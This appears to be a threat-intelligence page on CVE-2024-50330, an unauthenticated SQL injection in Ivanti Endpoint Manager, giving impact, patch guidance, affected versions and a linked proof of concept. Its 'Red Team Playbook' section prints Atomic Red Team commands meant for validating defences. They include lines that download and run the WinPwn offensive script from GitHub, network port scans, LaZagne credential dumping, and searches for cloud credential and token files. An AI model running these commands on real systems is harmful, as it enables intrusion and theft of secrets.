CVE-2024-50330
Overview
This vulnerability is a SQL injection flaw rooted in improper sanitization of user-supplied input within Ivanti Endpoint Manager's database query construction. The affected component fails to validate or parameterize SQL statements, allowing malicious input to alter the intended query logic. This occurs in versions prior to the 2024 November Security Update and the 2022 SU6 November Security Update, impacting the core database interaction layer of the product.
Vulnerability Description
SQL injection in Ivanti Endpoint Manager before 2024 November Security Update or 2022 SU6 November Security Update allows a remote unauthenticated attacker to achieve remote code execution.
Impact
An unauthenticated remote attacker can exploit this SQL injection vulnerability to execute arbitrary code on the affected system, leading to full compromise of the Ivanti Endpoint Manager server. Since the attack vector requires no authentication (PR:N) and has low attack complexity (AC:L), it enables remote code execution with high confidentiality, integrity, and availability impact (C:H/I:H/A:H). This can result in unauthorized data access, system control takeover, and disruption of endpoint management operations, severely affecting organizational security and management capabilities.
Solution
Ivanti recommends applying the November 2024 Security Update for Ivanti Endpoint Manager 2024 and the 2022 SU6 November Security Update for the 2022 product line to remediate this vulnerability. Detailed patch instructions and advisory information are available at https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2024-for-EPM-2024-and-EPM-2022. Organizations should upgrade affected versions to these fixed releases immediately to mitigate the risk of exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Ivanti Endpoint Manager is a critical SQL injection flaw that allows remote unauthenticated attackers to execute arbitrary code on affected systems. This vulnerability arises from improper handling of user-supplied input within SQL queries, which can lead to unauthorized access and manipulation of the database. Attackers exploiting this flaw can inject malicious SQL statements, potentially gaining access to sensitive data or executing commands on the underlying operating system. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a significant risk to organizations using the affected versions of the software.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving crafted HTTP requests that contain malicious SQL code. An attacker could target the web interface of Ivanti Endpoint Manager, sending specially formatted requests that manipulate the database queries executed by the application. Once the attacker successfully injects SQL commands, they can retrieve sensitive information, modify database entries, or execute system-level commands, leading to full system compromise. Scenarios may include using this access to deploy malware, exfiltrate data, or pivot to other systems within the network, amplifying the impact of the attack.
The real-world implications of this vulnerability are profound, particularly for organizations that rely on Ivanti Endpoint Manager for endpoint management and security. Successful exploitation could lead to significant data breaches, loss of sensitive information, and disruption of business operations. The potential for remote code execution means that attackers could gain control over critical infrastructure, posing risks not only to the organization but also to its clients and partners. The financial repercussions could be severe, including regulatory fines, legal liabilities, and reputational damage, all of which could have long-lasting effects on the organization’s viability.
To detect and mitigate this vulnerability, organizations should prioritize immediate patching of affected systems by applying the latest security updates provided by Ivanti. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the application and its configurations. Additionally, implementing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. Organizations should also adopt secure coding practices to prevent SQL injection vulnerabilities in future development efforts, including input validation, parameterized queries, and the principle of least privilege for database access.
In conclusion, the SQL injection vulnerability in Ivanti Endpoint Manager represents a significant threat to organizations that utilize this software for endpoint management. The potential for remote code execution poses a serious risk, making it imperative for organizations to take proactive measures to secure their environments. By understanding the nature of the vulnerability, recognizing the attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical flaw.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2024-50330, with new exploit developments significantly altering the threat landscape. Our telemetry indicates a sharp increase in detection events, accompanied by the emergence of a publicly available proof-of-concept exploit hosted on GitHub. This development lowers the barrier for threat actors to weaponize the vulnerability, potentially accelerating exploitation attempts across diverse environments. The availability of this exploit code correlates with the introduction of new automated tools targeting Ivanti Endpoint Manager, expanding the pool of adversaries capable of leveraging this SQL injection flaw for remote code execution. Although the EPSS score remains stable, the presence of active exploitation tools and increased detection frequency elevates the operational risk for organizations running affected versions. This shift underscores a heightened urgency for defenders to monitor for exploitation indicators and reassess their exposure, as the vulnerability is now more accessible and actively targeted in the wild.
Affected Products (8)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager | All |
cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:-:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su1:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su2:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su3:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su4:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2022 |
cpe:2.3:a:ivanti:endpoint_manager:2022:su5:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager | 2024 |
cpe:2.3:a:ivanti:endpoint_manager:2024:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
razureink/cve-2024-50330-ivanti_epm_sqli_reproduction
CVE Reproduction: cve-2024-50330-ivanti_epm_sqli_reproduction
|
razureink | 0 | 0 | 2026-07-23 | View |
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-50330 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-EPM-November-2024-for-EPM-2024-and-EPM-2022 |